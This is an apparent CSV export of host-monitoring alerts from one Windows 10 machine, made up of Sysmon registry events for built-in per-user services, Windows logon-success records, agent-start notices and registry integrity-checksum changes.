(0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CDPUserSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CDPUserSvc_3ea3f\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 10:25:40.052",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.991991400Z"",""eventRecordID"":""513"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k ClipboardSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p""" +"Apr 24, 2020 @ 10:25:40.038",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.991359400Z"",""eventRecordID"":""512"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\cbdhsvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\cbdhsvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\cbdhsvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.992",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.989431900Z"",""eventRecordID"":""511"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k LocalService -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k LocalService -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k LocalService -p""" +"Apr 24, 2020 @ 10:25:39.972",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.988868400Z"",""eventRecordID"":""510"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.946\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\CaptureService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.946"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\CaptureService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.946 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\CaptureService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.942",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.949547400Z"",""eventRecordID"":""509"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BthAppGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BthAppGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BthAppGroup -p""" +"Apr 24, 2020 @ 10:25:39.915",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.949183100Z"",""eventRecordID"":""508"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BluetoothUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BluetoothUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BluetoothUserService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.848",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.947818600Z"",""eventRecordID"":""507"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k BcastDVRUserService""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k BcastDVRUserService""" +"Apr 24, 2020 @ 10:25:39.739",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.947480600Z"",""eventRecordID"":""506"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\BcastDVRUserService_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\BcastDVRUserService_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\BcastDVRUserService_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:39.722",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.946158400Z"",""eventRecordID"":""505"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ea3f\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ea3f\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k AarSvcGroup -p""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ea3f\ImagePath +Details: C:\Windows\system32\svchost.exe -k AarSvcGroup -p""" +"Apr 24, 2020 @ 10:25:39.585",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T10:25:34.945947200Z"",""eventRecordID"":""504"",""processID"":""2148"",""threadID"":""2680"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 10:25:34.930\r\nProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000}\r\nProcessId: 584\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\AarSvc_3ea3f\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 10:25:34.930"",""processGuid"":""{df9fc3d3-be95-5ea2-0000-001031a80000}"",""processId"":""584"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\AarSvc_3ea3f\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 10:25:34.930 +ProcessGuid: {df9fc3d3-be95-5ea2-0000-001031a80000} +ProcessId: 584 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\AarSvc_3ea3f\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 10:25:37.880",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:25:36.078",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36DE6 + Linked Logon ID: 0x36DB7 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:35.863",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x36DB7 + Linked Logon ID: 0x36DE6 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x154 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:34.110",7,"SessionEnv was unavailable to handle a critical notification event",,"""The winlogon notification subscriber was unavailable to handle a critical notification event.""" +"Apr 24, 2020 @ 10:25:33.625",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x248 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:25:31.685",3,"Ossec agent started.","ossec: Agent started: 'windows-10->any'.", +"Apr 24, 2020 @ 10:25:05.443",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters' checksum changed. +Old md5sum was: '39324a091e8e394cfa0881ee3414520b' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: 'fa56f0ef6e21e4f64af4ae07bada3b859656ac2b' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 10:25:05.428",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9' checksum changed. +Old md5sum was: '3ab42836b91eda6d7a737f85db75cc0f' +New md5sum is : 'd41d8cd98f00b204e9800998ecf8427e' +Old sha1sum was: '3e85e472ca462ac01899caabb6d29f1f7cf46732' +New sha1sum is : 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +", +"Apr 24, 2020 @ 10:25:02.060",5,"SessionEnv was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:25:01.950",5,"WSearch was unavailable to handle a notification event",,"""The winlogon notification subscriber was unavailable to handle a notification event.""" +"Apr 24, 2020 @ 10:24:49.661",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:24:23.587",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 10:24:08.428",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - 